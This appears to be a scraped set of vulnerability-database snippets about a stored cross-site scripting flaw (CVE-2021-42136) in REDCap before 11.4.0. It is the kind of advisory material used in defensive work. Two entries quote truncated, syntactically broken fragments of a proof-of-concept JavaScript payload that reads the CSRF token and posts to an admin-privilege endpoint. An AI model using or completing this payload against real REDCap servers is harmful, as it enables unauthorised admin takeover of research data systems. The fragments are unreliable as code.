REDCap 11.3.9 - Stored Cross Site Scripting Vulnerability

Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting Exploit Author: Kendrick Lam References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js Vendor Homepage: https://projectredcap.org Software Link: https://projectredcap.org Version: Redcap before 11.4.0 Tested on: 11.2.5 CVE...

REDCap Cross-Site Scripting Vulnerability (CNVD-2022-81345)

A cross-site scripting vulnerability exists in versions of REDCap prior to 11.4.0, which stems from a lack of data validation filtering of user-supplied data and output in the missing data code functionality of the program. An attacker could exploit this vulnerability to execute JavaScript code o...

REDCap Cross Site Scripting Vulnerability

REDCap versions prior to 11.4.0 suffer from a persistent cross site scripting vulnerability that can be leveraged to escalate privileges. Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr =...

REDCap Cross Site Scripting

Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr = new XMLHttpRequest; xhr.open"POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true;...